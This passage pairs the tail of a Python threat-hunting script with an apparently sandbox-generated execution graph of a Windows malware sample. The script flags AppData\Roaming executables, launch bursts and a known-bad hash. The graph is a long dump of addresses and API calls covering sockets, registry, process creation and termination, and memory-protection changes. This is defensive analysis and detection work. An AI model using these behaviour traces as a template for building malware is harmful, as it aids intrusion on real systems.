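    """Events whose image lives exactly one folder below AppData\\Roaming."""
    return [e for e in events if ROAMING_EXE.match(e[1])]


def repeated_launches(events, min_count=3, window=timedelta(minutes=2)):
    """Group by (image path, md5) and report groups whose largest burst of
    launches inside any sliding `window` reaches `min_count`."""
    groups = defaultdict(list)
    for ts, path, md5 in events:
        groups[(path.lower(), md5.lower())].append(parse(ts))
    hits = {}
    for key, times in groups.items():
        times.sort()
        largest = max(
            sum(1 for t in times[i:] if t - start <= window)
            for i, start in enumerate(times))
        if largest >= min_count:
            hits[key] = largest
    return hits


def ioc_matches(events, known_md5s=frozenset({KNOWN_MD5})):
    """Image paths whose hash is on the known-bad list."""
    return {path for _, path, md5 in events if md5.lower() in known_md5s}


def hunt(events):
    """Run the three checks and return the combined findings."""
    roaming = roaming_executables(events)
    return {
        "roaming_exes": sorted({e[1] for e in roaming}),
        "bursts": repeated_launches(roaming),
        "ioc_matches": ioc_matches(events),
    }


if __name__ == "__main__":
    for name, finding in hunt(SAMPLE_EVENTS).items():
        print(name, finding)
```

The burst rule is the part worth keeping even when the hash changes between builds: a non-elevated executable in a freshly created Roaming subfolder that restarts itself several times within a couple of minutes is unusual for legitimate software and cheap to alert on, while the hash match only catches this exact build.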


                                        Execution Graph

                                        Execution Coverage:4.8%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:10.3%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:39
                                        [Execution graph: the interactive node/edge rendering is not reproduced here. API nodes reached in the graph include Winsock setup and local address discovery (WSAStartup, gethostname, gethostbyname, inet_ntoa, MultiByteToWideChar, WSACleanup); outbound connection handling (socket, connect, send, WSAGetLastError, closesocket); registry access (RegConnectRegistryW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey); COM object lookup (CoInitialize, CoCreateInstance, CLSIDFromProgID, ProgIDFromCLSID, CLSIDFromString, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoUninitialize, VariantInit, VariantClear, SysAllocString, SysFreeString); file access (GetFileAttributesW, GetFullPathNameW, GetFileVersionInfoSizeW, ReadFile, SetFilePointerEx, CloseHandle); window and input state (GetCursorPos, GetForegroundWindow, SetWindowTextW); timing (timeGetTime, Sleep); LoadLibraryW; heap and CRT paths (RtlAllocateHeap, RaiseException, GetModuleHandleExW, GetProcAddress, ExitProcess). The graph listing is truncated in the source.]
37230a 90413->90415 90481 33f0f3 48 API calls 90414->90481 90416 34010a 48 API calls 90415->90416 90418 372311 90416->90418 90419 37231f 90418->90419 90468 325080 49 API calls 90418->90468 90421 3284a6 81 API calls 90419->90421 90423 372331 90421->90423 90422 372379 90424 37234d 90422->90424 90426 37243f 90422->90426 90429 3723bb 90422->90429 90469 324bf9 90423->90469 90424->90256 90427 36be47 50 API calls 90426->90427 90430 372446 90427->90430 90432 3284a6 81 API calls 90429->90432 90488 36689f SetFilePointerEx SetFilePointerEx WriteFile 90430->90488 90435 3723c2 90432->90435 90434 3723f6 90450 3667dc 90434->90450 90435->90434 90443 372400 90435->90443 90482 327b6e 90443->90482 90445 3250ec CloseHandle 90447 372490 90445->90447 90489 324592 CloseHandle 90447->90489 90448 3723fe Mailbox 90448->90424 90448->90445 90451 3667f6 90450->90451 90452 3667ec 90450->90452 90454 3667fc 90451->90454 90455 366808 90451->90455 90506 366917 SetFilePointerEx SetFilePointerEx WriteFile 90452->90506 90507 3668b9 51 API calls 90454->90507 90457 366824 90455->90457 90458 366811 90455->90458 90490 32a6d4 90457->90490 90460 32a6d4 48 API calls 90458->90460 90462 3667f4 Mailbox 90462->90448 90468->90419 90470 3250ec CloseHandle 90469->90470 90471 324c04 90470->90471 90546 324b88 90471->90546 90481->90422 90483 34010a 48 API calls 90482->90483 90484 327b93 90483->90484 90485 32a6f8 48 API calls 90484->90485 90486 327ba2 90485->90486 90488->90448 90489->90424 90506->90462 90507->90462 90547 324ba1 CreateFileW 90546->90547 90548 394957 90546->90548 90549 324bc3 90547->90549 90548->90549 90550 39495d CreateFileW 90548->90550 90550->90549 90601 32e216 90600->90601 90634 32e226 Mailbox 90600->90634 90602 32e670 90601->90602 90601->90634 90730 33ecee 411 API calls 90602->90730 90603 32e4e7 90605 32e4fd 90603->90605 90731 32322e 16 API calls 90603->90731 90605->89947 90607 32e681 90607->90605 90608 32e68e 90607->90608 90732 33ec33 411 API calls Mailbox 90608->90732 90609 32e26c PeekMessageW 
90609->90634 90611 32e695 LockWindowUpdate DestroyWindow GetMessageW 90611->90605 90614 32e6c7 90611->90614 90612 395b13 Sleep 90612->90634 90617 33cf79 49 API calls 90617->90634 90619 32e657 PeekMessageW 90619->90634 90620 32e517 timeGetTime 90620->90634 90622 34010a 48 API calls 90622->90634 90623 32c935 48 API calls 90623->90634 90624 32e641 TranslateMessage DispatchMessageW 90624->90619 90625 395dfc WaitForSingleObject 90626 395e19 GetExitCodeProcess CloseHandle 90625->90626 90625->90634 90626->90634 90627 32d3d2 48 API calls 90637 395cce Mailbox 90627->90637 90628 396147 Sleep 90628->90637 90629 32e6cc timeGetTime 90733 33cf79 49 API calls 90629->90733 90630 395feb Sleep 90630->90634 90634->90603 90634->90609 90634->90612 90634->90617 90634->90619 90634->90620 90634->90622 90634->90623 90634->90624 90634->90625 90634->90628 90634->90629 90634->90630 90634->90637 90642 395cea Sleep 90634->90642 90645 321dce 107 API calls 90634->90645 90653 32fa40 387 API calls 90634->90653 90655 3344e0 387 API calls 90634->90655 90656 333680 387 API calls 90634->90656 90658 32d380 55 API calls 90634->90658 90659 36d520 86 API calls 90634->90659 90660 32caee 48 API calls 90634->90660 90661 321000 387 API calls 90634->90661 90662 32e7e0 90634->90662 90669 32ea00 90634->90669 90719 33f381 90634->90719 90724 33ed1a 90634->90724 90729 32e7b0 411 API calls Mailbox 90634->90729 90734 388b20 48 API calls 90634->90734 90742 33e3a5 timeGetTime 90634->90742 90636 3961de GetExitCodeProcess 90640 39620a CloseHandle 90636->90640 90641 3961f4 WaitForSingleObject 90636->90641 90637->90627 90637->90634 90637->90636 90637->90642 90643 395cd7 Sleep 90637->90643 90644 388a48 108 API calls 90637->90644 90647 396266 Sleep 90637->90647 90648 32caee 48 API calls 90637->90648 90735 3656dc 49 API calls Mailbox 90637->90735 90736 33cf79 49 API calls 90637->90736 90737 32d380 90637->90737 90741 321000 411 API calls 90637->90741 90743 37d12a 50 API calls 90637->90743 90744 368355 QueryPerformanceCounter 
QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 90637->90744 90745 33e3a5 timeGetTime 90637->90745 90746 366f5b CreateToolhelp32Snapshot Process32FirstW 90637->90746 90640->90637 90641->90634 90641->90640 90642->90634 90643->90642 90644->90637 90645->90634 90647->90634 90648->90637 90653->90634 90655->90634 90656->90634 90658->90634 90659->90634 90660->90634 90661->90634 90663 32e80f 90662->90663 90664 32e7fd 90662->90664 90784 36d520 86 API calls 4 library calls 90663->90784 90753 32dcd0 90664->90753 90666 32e806 90666->90634 90668 3998e8 90668->90668 90670 32ea20 90669->90670 90671 32fa40 411 API calls 90670->90671 90673 32ea89 90670->90673 90674 399919 90671->90674 90672 3999bc 90799 36d520 86 API calls 4 library calls 90672->90799 90678 32d3d2 48 API calls 90673->90678 90700 32eb18 90673->90700 90702 32ecd7 Mailbox 90673->90702 90674->90673 90796 36d520 86 API calls 4 library calls 90674->90796 90676 32d3d2 48 API calls 90679 399997 90676->90679 90680 399963 90678->90680 90798 341b2a 52 API calls __cinit 90679->90798 90797 341b2a 52 API calls __cinit 90680->90797 90681 36d520 86 API calls 90681->90702 90683 399d70 90808 37e2fb 411 API calls Mailbox 90683->90808 90685 32d380 55 API calls 90685->90702 90687 399dc2 90810 36d520 86 API calls 4 library calls 90687->90810 90688 399ddf 90811 37c235 411 API calls Mailbox 90688->90811 90690 32fa40 411 API calls 90690->90702 90691 32342c 48 API calls 90691->90702 90692 399e49 90813 36d520 86 API calls 4 library calls 90692->90813 90694 3314a0 48 API calls 90694->90702 90699 399df7 90718 32ef0c Mailbox 90699->90718 90812 36d520 86 API calls 4 library calls 90699->90812 90700->90676 90700->90702 90702->90672 90702->90681 90702->90683 90702->90685 90702->90687 90702->90688 90702->90690 90702->90691 90702->90692 90702->90694 90703 32f56f 90702->90703 90706 399a3c 90702->90706 90702->90718 90792 32d805 90702->90792 90800 36a3ee 48 API calls 90702->90800 90801 37ede9 411 API calls 90702->90801 90806 35a599 
InterlockedDecrement 90702->90806 90807 37f4df 411 API calls 90702->90807 90703->90718 90809 36d520 86 API calls 4 library calls 90703->90809 90802 37d154 48 API calls 90706->90802 90708 399a48 90711 399a9b 90708->90711 90718->90634 90720 39ee11 90719->90720 90721 33f390 90719->90721 90722 39ee46 90720->90722 90723 39ee28 TranslateAcceleratorW 90720->90723 90721->90634 90723->90721 90725 33ed2c 90724->90725 90726 33ed34 90724->90726 90725->90634 90726->90725 90727 33ed5e IsDialogMessageW 90726->90727 90728 39ebec GetClassLongW 90726->90728 90727->90725 90727->90726 90728->90726 90728->90727 90729->90634 90730->90603 90731->90607 90732->90611 90733->90634 90734->90634 90735->90637 90736->90637 90738 32d38b 90737->90738 90739 32d3b4 90738->90739 90814 32d772 55 API calls 90738->90814 90739->90637 90741->90637 90742->90634 90743->90637 90744->90637 90745->90637 90815 3679c2 90746->90815 90748 366fa4 Process32NextW 90749 367021 CloseHandle 90748->90749 90752 366fa0 _wcscat 90748->90752 90749->90637 90751 341bc7 _W_store_winword 59 API calls 90751->90752 90752->90748 90752->90749 90752->90751 90821 34297d 90752->90821 90754 32fa40 411 API calls 90753->90754 90768 32dd0f _memmove 90754->90768 90755 398dbe 90791 36d520 86 API calls 4 library calls 90755->90791 90758 32dd70 90758->90666 90759 32e12b Mailbox 90762 34010a 48 API calls 90759->90762 90760 34010a 48 API calls 90760->90768 90761 32e051 90763 32e066 90761->90763 90764 398daf 90761->90764 90774 32decb _memmove 90762->90774 90768->90755 90768->90758 90768->90759 90768->90760 90769 32deb7 90768->90769 90779 32df29 90768->90779 90769->90759 90771 32dec4 90769->90771 90773 34010a 48 API calls 90771->90773 90772 398d9e 90789 36d520 86 API calls 4 library calls 90772->90789 90773->90774 90774->90779 90777 32df64 90777->90666 90779->90761 90779->90772 90779->90777 90780 398d76 90779->90780 90782 398d51 90779->90782 90786 325322 411 API calls 90779->90786 90784->90668 90786->90779 90789->90777 90794 32d815 90792->90794 
90795 32d828 _memmove 90792->90795 90793 34010a 48 API calls 90793->90795 90794->90793 90794->90795 90795->90702 90796->90673 90797->90700 90798->90702 90799->90718 90800->90702 90801->90702 90802->90708 90806->90702 90807->90702 90808->90703 90809->90718 90810->90718 90811->90699 90812->90718 90813->90718 90814->90739 90816 3679e9 90815->90816 90818 3679d0 90815->90818 90825 34224a 58 API calls __wcstoi64 90816->90825 90818->90816 90819 3679ef 90818->90819 90824 3422df GetStringTypeW wcstoxq 90818->90824 90819->90752 90826 3429c7 90821->90826 90824->90818 90825->90819 90853 366d8a __NMSG_WRITE 90852->90853 90854 366db3 GetFileAttributesW 90853->90854 90855 366dc5 GetLastError 90854->90855 90862 366de3 90854->90862 90856 366de7 90855->90856 90857 366dd0 CreateDirectoryW 90855->90857 90858 323bcf 48 API calls 90856->90858 90856->90862 90857->90856 90857->90862 90859 366df7 _wcsrchr 90858->90859 90860 366d6d 48 API calls 90859->90860 90859->90862 90861 366e1b 90860->90861 90861->90862 90863 366e28 CreateDirectoryW 90861->90863 90862->90270 90863->90862 90865 327e53 48 API calls 90864->90865 90866 3678df 90865->90866 90867 33e617 48 API calls 90866->90867 90868 3678eb 90867->90868 90869 37267a 90868->90869 90870 3726a4 __NMSG_WRITE 90869->90870 90871 36f039 90870->90871 90873 3726d8 90870->90873 90875 372763 90870->90875 90871->90278 90876 3239e8 48 API calls 2 library calls 90871->90876 90873->90871 90878 33dfd2 60 API calls 90873->90878 90875->90871 90879 33dfd2 60 API calls 90875->90879 90876->90278 90878->90873 90879->90875 90881 32a9af 90880->90881 90884 32a9ca 90880->90884 90882 32b8a7 48 API calls 90881->90882 90883 32a9b7 CharUpperBuffW 90882->90883 90883->90884 90884->89966 90886 394c5a 90885->90886 90887 3210f9 90885->90887 90888 34010a 48 API calls 90887->90888 90889 321100 90888->90889 90890 321121 90889->90890 90919 32113c 48 API calls 90889->90919 90890->89990 90892->89974 90893->90012 90894->90012 90895->90012 90896->90033 90897->89974 90899 32d30a 
90898->90899 90900 32d2df 90898->90900 90899->89987 90899->89988 90903 32d2e6 90900->90903 90921 32d349 53 API calls 90900->90921 90903->90899 90920 32d349 53 API calls 90903->90920 90904->90030 90905->90018 90906->90018 90908->90030 90909->90000 90910->90030 90911->90030 90912->90030 90913->90012 90914->90012 90915->90012 90916->90030 90917->90007 90918->90030 90919->90890 90920->90899 90921->90903 90922->90049 90923->90049 90924->89468 90925->89468 90926->89468 90927->89468 90928->89468 90929->89463 90930->89451 90931->89441 90932->89437 90933->89445 90934->89454 90943 37ae3b 90935->90943 90938 37ad05 Mailbox 90939 37ad31 htons 90938->90939 90940 37ad1b 90938->90940 90939->90940 90940->89501 90942 36d7f2 90941->90942 90942->89508 90944 32a6d4 48 API calls 90943->90944 90945 37ae49 90944->90945 90948 37ae79 WideCharToMultiByte 90945->90948 90947 37acf3 inet_addr 90947->90938 90949 37aea7 90948->90949 90950 37ae9d 90948->90950 90952 34010a 48 API calls 90949->90952 90951 33f324 48 API calls 90950->90951 90955 37aea5 90951->90955 90953 37aeae WideCharToMultiByte 90952->90953 90954 33f2d0 48 API calls 90953->90954 90954->90955 90955->90947 90957 3823eb _memset 90956->90957 90958 382428 90957->90958 90959 382452 90957->90959 90960 32cdb4 48 API calls 90958->90960 90961 32cdb4 48 API calls 90959->90961 90965 382476 90959->90965 90962 382433 90960->90962 90964 382448 90961->90964 90962->90965 90967 32cdb4 48 API calls 90962->90967 90963 3824b0 90966 3284a6 81 API calls 90963->90966 90970 32cdb4 48 API calls 90964->90970 90965->90963 90968 32cdb4 48 API calls 90965->90968 90969 3824d4 90966->90969 90967->90964 90968->90963 90971 323bcf 48 API calls 90969->90971 90970->90965 90972 3824de 90971->90972 90973 3824e8 90972->90973 90974 3825a1 90972->90974 90976 3284a6 81 API calls 90973->90976 90975 3825d3 GetCurrentDirectoryW 90974->90975 90977 3284a6 81 API calls 90974->90977 90978 34010a 48 API calls 90975->90978 90979 3824f9 90976->90979 90980 3825b8 90977->90980 90981 
3825f8 GetCurrentDirectoryW 90978->90981 90982 323bcf 48 API calls 90979->90982 90983 323bcf 48 API calls 90980->90983 90984 382605 90981->90984 90985 382503 90982->90985 90986 3825c2 __NMSG_WRITE 90983->90986 90989 32ca8e 48 API calls 90984->90989 90996 38263e 90984->90996 90987 3284a6 81 API calls 90985->90987 90986->90975 90986->90996 90988 382514 90987->90988 90990 323bcf 48 API calls 90988->90990 90991 38261e 90989->90991 90992 38251e 90990->90992 90993 32ca8e 48 API calls 90991->90993 90994 3284a6 81 API calls 90992->90994 90997 38262e 90993->90997 90998 38252f 90994->90998 90995 38268a 91000 38274c CreateProcessW 90995->91000 91001 3826c1 90995->91001 90996->90995 91034 36a17a 8 API calls 90996->91034 91002 32ca8e 48 API calls 90997->91002 91003 323bcf 48 API calls 90998->91003 91014 38276b 91000->91014 91037 35bc90 69 API calls 91001->91037 91002->90996 91006 382539 91003->91006 91004 382655 91035 36a073 8 API calls 91004->91035 91008 38256f GetSystemDirectoryW 91006->91008 91010 3284a6 81 API calls 91006->91010 91012 34010a 48 API calls 91008->91012 91009 382670 91036 36a102 8 API calls 91009->91036 91013 382550 91010->91013 91015 382594 GetSystemDirectoryW 91012->91015 91016 323bcf 48 API calls 91013->91016 91018 3827bd CloseHandle 91014->91018 91019 382780 91014->91019 91015->90984 91017 38255a __NMSG_WRITE 91016->91017 91017->90984 91017->91008 91020 3827cb 91018->91020 91028 3827f5 91018->91028 91023 382791 GetLastError 91019->91023 91038 369d09 CloseHandle Mailbox 91020->91038 91022 3827fb 91025 3827a5 91022->91025 91023->91025 91039 369b29 CloseHandle 91025->91039 91028->91022 91029 382827 CloseHandle 91028->91029 91029->91025 91030 381f2b 91030->89340 91033 3826df __NMSG_WRITE 91033->91014 91034->91004 91035->91009 91036->90995 91037->91033 91039->91030 91041 32d89e 50 API calls 91040->91041 91042 321a08 91041->91042 91043 321a12 91042->91043 91044 39db7d 91042->91044 91046 3284a6 81 API calls 91043->91046 91045 327e53 48 API calls 91044->91045 
91047 39db8d 91045->91047 91048 321a1f 91046->91048 91047->91047 91049 32c935 48 API calls 91048->91049 91050 321a2d 91049->91050 91051 321dce 91050->91051 91052 321de4 Mailbox 91051->91052 91053 39db26 91052->91053 91057 321dfd 91052->91057 91054 39db2b IsWindow 91053->91054 91055 321e51 91054->91055 91056 39db3f 91054->91056 91055->89517 91055->89518 91141 32200a 91056->91141 91058 321e46 91057->91058 91059 3284a6 81 API calls 91057->91059 91058->91055 91063 39db65 IsWindow 91058->91063 91061 321e17 91059->91061 91088 321f04 91061->91088 91063->91055 91063->91056 91067 32c4cd 48 API calls 91066->91067 91068 35e2fe 91067->91068 91186 32193b SendMessageTimeoutW 91068->91186 91070 35e305 91081 35e309 Mailbox 91070->91081 91187 35e390 91070->91187 91073 34010a 48 API calls 91074 35e338 _strlen 91073->91074 91075 35e378 91074->91075 91076 35e35a 91074->91076 91074->91081 91077 327e53 48 API calls 91075->91077 91190 35e0f5 48 API calls 2 library calls 91076->91190 91077->91081 91079 35e362 91191 32c610 MultiByteToWideChar 91079->91191 91081->89523 91083 327c3a 91082->91083 91084 327bfb 91082->91084 91085 32c935 48 API calls 91083->91085 91086 34010a 48 API calls 91084->91086 91087 327c0e 91085->91087 91086->91087 91087->89525 91089 321f1a Mailbox 91088->91089 91090 32c935 48 API calls 91089->91090 91091 321f3e 91090->91091 91092 32c935 48 API calls 91091->91092 91093 321f49 91092->91093 91094 327e53 48 API calls 91093->91094 91095 321f59 91094->91095 91096 32d3d2 48 API calls 91095->91096 91097 321f87 91096->91097 91098 32d3d2 48 API calls 91097->91098 91099 321f90 91098->91099 91100 32d3d2 48 API calls 91099->91100 91101 321f99 91100->91101 91102 392569 91101->91102 91103 321fac 91101->91103 91151 35e4ea 60 API calls 3 library calls 91102->91151 91104 392583 91103->91104 91106 321fbe GetForegroundWindow 91103->91106 91142 322016 91141->91142 91143 34010a 48 API calls 91142->91143 91144 322023 91143->91144 91145 32197e 91144->91145 91146 321990 91145->91146 91150 
3219af _memmove 91145->91150 91148 34010a 48 API calls 91146->91148 91147 34010a 48 API calls 91149 3219c6 91147->91149 91148->91150 91149->91055 91150->91147 91151->91104 91186->91070 91210 32193b SendMessageTimeoutW 91187->91210 91189 35e314 91189->91073 91190->91079 91210->91189 91212 367700 91211->91212 91222 3676f9 _wcsncpy 91211->91222 91213 34010a 48 API calls 91212->91213 91214 367706 GetFileVersionInfoW 91213->91214 91215 367722 __NMSG_WRITE 91214->91215 91216 34010a 48 API calls 91215->91216 91221 367739 _wcscat _wcscmp _wcscpy _wcsstr 91216->91221 91217 341bc7 _W_store_winword 59 API calls 91218 3677f7 91217->91218 91219 367827 75381560 91218->91219 91218->91222 91220 36783d _wcscmp 91219->91220 91219->91222 91220->91222 91226 34234b 80 API calls 3 library calls 91220->91226 91223 367779 75381560 91221->91223 91225 367793 _wcscat 91221->91225 91222->89533 91223->91225 91225->91217 91226->91222 91228 33f057 91227->91228 91229 33f069 91227->91229 91230 33f063 91228->91230 91231 33f05d 91228->91231 91232 32c4cd 48 API calls 91229->91232 91235 32a6d4 48 API calls 91230->91235 91234 32a6d4 48 API calls 91231->91234 91233 3664f5 91232->91233 91242 366524 91233->91242 91262 36649b ReadFile SetFilePointerEx 91233->91262 91263 32bd2f 48 API calls _memmove 91233->91263 91236 33f081 91234->91236 91237 36668b 91235->91237 91256 324c4f 91236->91256 91240 324c4f 50 API calls 91237->91240 91241 366699 91240->91241 91246 3666a9 Mailbox 91241->91246 91264 366765 50 API calls 91241->91264 91242->89573 91244 3949b2 91246->89573 91248 32c610 50 API calls 91249 33f0a3 Mailbox 91248->91249 91249->89573 91250->89551 91251->89578 91252->89547 91253->89552 91254->89569 91255->89575 91257 33f324 48 API calls 91256->91257 91258 324c60 91257->91258 91259 324ca0 2 API calls 91258->91259 91260 324c95 91258->91260 91265 324d29 91258->91265 91259->91258 91260->91244 91260->91248 91262->91233 91263->91233 91264->91246 91266 3945cf 91265->91266 91267 324d3d 91265->91267 91269 32a6f8 48 
API calls 91266->91269 91274 324d67 91267->91274 91270 3945da 91269->91270 91272 34010a 48 API calls 91270->91272 91271 324d49 91271->91258 91273 3945ef _memmove 91272->91273 91275 324d7d 91274->91275 91278 324d78 _memmove 91274->91278 91276 394703 91275->91276 91277 34010a 48 API calls 91275->91277 91277->91278 91278->91271 91280 32816b 91279->91280 91281 3280f9 91279->91281 91282 32a2fb 48 API calls 91280->91282 91281->91280 91283 328105 91281->91283 91289 32813a _memmove 91282->91289 91284 328163 91283->91284 91285 328110 91283->91285 91314 327eda 48 API calls 91284->91314 91286 32a6f8 48 API calls 91285->91286 91288 32811a 91286->91288 91290 34010a 48 API calls 91288->91290 91289->89640 91290->91289 91292 323334 91291->91292 91294 323339 Mailbox 91291->91294 91315 32342c 48 API calls 91292->91315 91299 323347 91294->91299 91316 32346e 48 API calls 91294->91316 91296 34010a 48 API calls 91298 3233d8 91296->91298 91297 323422 91297->89631 91300 34010a 48 API calls 91298->91300 91299->91296 91299->91297 91301 3233e3 91300->91301 91301->89631 91302->89640 91304 34010a 48 API calls 91303->91304 91305 32818f 91304->91305 91305->89640 91306->89640 91307->89628 91308->89628 91309->89640 91310->89647 91311->89649 91312->89609 91313->89634 91314->91289 91315->91294 91316->91299 91317->89688 91319 33dd89 91318->91319 91320 394a7d FindFirstFileW 91318->91320 91319->89340 91321 394a8e 91320->91321 91322 394a95 FindClose 91320->91322 91321->91322 91324 3284a6 81 API calls 91323->91324 91325 37f7db 91324->91325 91348 37f81d Mailbox 91325->91348 91359 380458 91325->91359 91327 37fa7c 91328 37fbeb 91327->91328 91332 37fa86 91327->91332 91394 380579 89 API calls Mailbox 91328->91394 91331 37fbf8 91331->91332 91333 37fc04 91331->91333 91372 37f5fb 91332->91372 91333->91348 91334 3284a6 81 API calls 91344 37f875 Mailbox 91334->91344 91339 37faba 91386 33f92c 91339->91386 91342 37fad4 91392 36d520 86 API calls 4 library calls 91342->91392 91343 37faee 91345 323320 48 API calls 
91343->91345 91344->91327 91344->91334 91344->91348 91390 3828d9 48 API calls _memmove 91344->91390 91391 37fc96 60 API calls 2 library calls 91344->91391 91349 37fb05 91345->91349 91347 37fadf GetCurrentProcess TerminateProcess 91347->91343 91348->89711 91350 3314a0 48 API calls 91349->91350 91358 37fb2f 91349->91358 91351 37fb1e 91350->91351 91393 380300 105 API calls _free 91351->91393 91353 3314a0 48 API calls 91353->91358 91354 37fc56 91354->91348 91355 37fc6f FreeLibrary 91354->91355 91355->91348 91357 32d89e 50 API calls 91357->91358 91358->91353 91358->91354 91358->91357 91395 380300 105 API calls _free 91358->91395 91360 32b8a7 48 API calls 91359->91360 91361 380473 CharLowerBuffW 91360->91361 91362 37267a 60 API calls 91361->91362 91363 380494 91362->91363 91365 32d3d2 48 API calls 91363->91365 91370 3804cf Mailbox 91363->91370 91366 3804ac 91365->91366 91367 327f40 48 API calls 91366->91367 91368 3804c3 91367->91368 91369 32a2fb 48 API calls 91368->91369 91369->91370 91371 38050b Mailbox 91370->91371 91396 37fc96 60 API calls 2 library calls 91370->91396 91371->91344 91373 37f616 91372->91373 91377 37f66b 91372->91377 91374 34010a 48 API calls 91373->91374 91375 37f638 91374->91375 91376 34010a 48 API calls 91375->91376 91375->91377 91376->91375 91378 380719 91377->91378 91379 380944 Mailbox 91378->91379 91385 38073c _strcat _wcscpy __NMSG_WRITE 91378->91385 91379->91339 91380 32d00b 58 API calls 91380->91385 91381 32cdb4 48 API calls 91381->91385 91382 3284a6 81 API calls 91382->91385 91383 3445ec 47 API calls __malloc_crt 91383->91385 91385->91379 91385->91380 91385->91381 91385->91382 91385->91383 91397 368932 50 API calls __NMSG_WRITE 91385->91397 91388 33f941 91386->91388 91387 33f9d9 select 91389 33f9a7 91387->91389 91388->91387 91388->91389 91389->91342 91389->91343 91390->91344 91391->91344 91392->91347 91393->91358 91394->91331 91395->91358 91396->91371 91397->91385 91399 376b25 GetWindowRect 91398->91399 91400 376b42 91398->91400 91401 376b5c 
91399->91401 91400->91401 91402 376b52 ClientToScreen 91400->91402 91401->89715 91401->89719 91402->91401 91403->89721 91404->89725 91405->89733 91406->89745 91407->89755 91408->89756 91409->89777 91410->89779 91411->89787 91412->89806 91413->89822 91414->89822 91415->89833 91416->89825 91417->89822 91418->89824 91419->89855 91420->89869 91421 394ddc 91422 334472 91421->91422 91423 394de6 VariantClear 91421->91423 91423->91422 91424 48b0c0 91425 48b0d0 91424->91425 91426 48b1ea LoadLibraryA 91425->91426 91429 48b22f VirtualProtect VirtualProtect 91425->91429 91427 48b201 91426->91427 91427->91425 91431 48b213 GetProcAddress 91427->91431 91430 48b294 91429->91430 91430->91430 91431->91427 91432 48b229 ExitProcess 91431->91432 91433 331118 91434 33e016 50 API calls 91433->91434 91435 33112e 91434->91435 91436 39abeb 91435->91436 91437 331148 91435->91437 91503 33cf79 49 API calls 91436->91503 91439 333680 411 API calls 91437->91439 91479 32fad8 Mailbox _memmove 91439->91479 91441 39b628 Mailbox 91442 39ac2a 91444 39ac4a Mailbox 91442->91444 91504 36ba5d 48 API calls 91442->91504 91507 36d520 86 API calls 4 library calls 91444->91507 91445 330119 91510 36d520 86 API calls 4 library calls 91445->91510 91448 33105e 91454 32c935 48 API calls 91448->91454 91449 330dee 91456 32d89e 50 API calls 91449->91456 91450 34010a 48 API calls 91450->91479 91451 331063 91509 36d520 86 API calls 4 library calls 91451->91509 91452 32c935 48 API calls 91452->91479 91467 32fbf1 Mailbox 91454->91467 91455 330dfa 91459 32d89e 50 API calls 91455->91459 91456->91455 91457 39b772 91511 36d520 86 API calls 4 library calls 91457->91511 91462 330e83 91459->91462 91460 32f6d0 411 API calls 91460->91479 91461 35a599 InterlockedDecrement 91461->91479 91466 32caee 48 API calls 91462->91466 91464 32d3d2 48 API calls 91464->91479 91465 39b7d2 91475 3310f1 Mailbox 91466->91475 91468 341b2a 52 API calls __cinit 91468->91479 91470 331230 91470->91467 91508 36d520 86 API calls 4 library calls 91470->91508 
91473 32fa40 411 API calls 91473->91479 91506 36d520 86 API calls 4 library calls 91475->91506 91477 39b583 91505 36d520 86 API calls 4 library calls 91477->91505 91479->91445 91479->91448 91479->91449 91479->91450 91479->91451 91479->91452 91479->91455 91479->91457 91479->91460 91479->91461 91479->91462 91479->91464 91479->91467 91479->91468 91479->91470 91479->91473 91479->91475 91479->91477 91480 381f19 132 API calls 91479->91480 91481 380bfa 129 API calls 91479->91481 91482 37013f 87 API calls 91479->91482 91483 33f03e 2 API calls 91479->91483 91484 3250a3 49 API calls 91479->91484 91485 3817aa 87 API calls 91479->91485 91486 378065 55 API calls 91479->91486 91487 33f461 98 API calls 91479->91487 91488 3281c6 85 API calls 91479->91488 91489 379122 91 API calls 91479->91489 91490 38798d 109 API calls 91479->91490 91491 3830ad 93 API calls 91479->91491 91492 38804e 111 API calls 91479->91492 91493 3792c0 88 API calls 91479->91493 91494 33dd84 3 API calls 91479->91494 91495 37b74b 411 API calls 91479->91495 91496 3810e5 82 API calls 91479->91496 91497 33ef0d 94 API calls 91479->91497 91498 331620 59 API calls Mailbox 91479->91498 91499 37ee52 82 API calls 2 library calls 91479->91499 91500 37ef9d 90 API calls Mailbox 91479->91500 91501 36b020 48 API calls 91479->91501 91502 37e713 411 API calls Mailbox 91479->91502 91480->91479 91481->91479 91482->91479 91483->91479 91484->91479 91485->91479 91486->91479 91487->91479 91488->91479 91489->91479 91490->91479 91491->91479 91492->91479 91493->91479 91494->91479 91495->91479 91496->91479 91497->91479 91498->91479 91499->91479 91500->91479 91501->91479 91502->91479 91503->91442 91504->91444 91505->91475 91506->91467 91507->91441 91508->91451 91509->91445 91510->91457 91511->91465 91512 3229c2 91513 3229cb 91512->91513 91514 322a48 91513->91514 91515 3229e9 91513->91515 91553 322a46 91513->91553 91517 322a4e 91514->91517 91518 392307 91514->91518 91519 3229f6 91515->91519 91520 322aac PostQuitMessage 91515->91520 91516 
322a2b NtdllDefWindowProc_W 91546 322a39 91516->91546 91521 322a53 91517->91521 91522 322a76 SetTimer RegisterClipboardFormatW 91517->91522 91567 32322e 16 API calls 91518->91567 91524 322a01 91519->91524 91525 39238f 91519->91525 91520->91546 91526 3922aa 91521->91526 91527 322a5a KillTimer 91521->91527 91529 322a9f CreatePopupMenu 91522->91529 91522->91546 91530 322ab6 91524->91530 91531 322a09 91524->91531 91573 3657fb 60 API calls _memset 91525->91573 91537 3922af 91526->91537 91538 3922e3 MoveWindow 91526->91538 91564 322b94 Shell_NotifyIconW _memset 91527->91564 91528 39232e 91568 33ec33 411 API calls Mailbox 91528->91568 91529->91546 91557 321e58 91530->91557 91535 322a14 91531->91535 91542 392374 91531->91542 91543 322a1f 91535->91543 91544 39235f 91535->91544 91539 3922b3 91537->91539 91540 3922d2 SetFocus 91537->91540 91538->91546 91539->91543 91547 3922bc 91539->91547 91540->91546 91541 322a6d 91565 322ac7 DeleteObject DestroyWindow Mailbox 91541->91565 91542->91516 91572 35b31f 48 API calls 91542->91572 91543->91516 91569 322b94 Shell_NotifyIconW _memset 91543->91569 91571 365fdb 70 API calls _memset 91544->91571 91545 3923a1 91545->91516 91545->91546 91566 32322e 16 API calls 91547->91566 91552 39236f 91552->91546 91553->91516 91555 392353 91570 323598 67 API calls _memset 91555->91570 91558 321ef1 91557->91558 